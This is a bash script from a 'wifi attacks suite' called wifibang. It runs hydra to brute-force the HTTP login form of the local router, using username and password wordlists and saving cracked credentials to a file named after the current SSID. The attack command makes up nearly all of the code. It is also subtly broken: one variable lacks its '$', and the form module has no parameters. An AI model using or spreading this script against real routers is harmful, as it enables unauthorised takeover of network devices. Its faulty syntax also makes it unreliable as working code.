#!/bin/bash


#wifibang    -    wifi attacks suite
#Copyright © 2018 Leviathan36 

# This file is part of wifibang.

#	wifibang is free software: you can redistribute it and/or modify
#	it under the terms of the GNU General Public License as published by
#	the Free Software Foundation, either version 3 of the License, or
#	(at your option) any later version.

#	wifibang is distributed in the hope that it will be useful,
#	but WITHOUT ANY WARRANTY; without even the implied warranty of
#	MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
#	GNU General Public License for more details.

#	You should have received a copy of the GNU General Public License
#	along with wifibang.  If not, see <http://www.gnu.org/licenses/>.



####################################################
                    #HYDRA-HTTP#
####################################################

user_directory="./user_hydra"
password_directory="./wordlists"
router_passwords="./router_passwords"

#WARNING: nmcli has language packet, so in some country the command could not work!   (somewhere "no" could be written in different way)
hydra -L $user_directory -P password_directory -o "${router_passwords}/`nmcli -t -f active,ssid dev wifi | grep -v no | cut -d ':' -f2`" `ip route show | head -n 1 | cut -d ' ' -f 3` http-post-form -v #this way is not elegant
# -t4 -f -w5 
exit 0

################### END HYDRA-HTTP #################

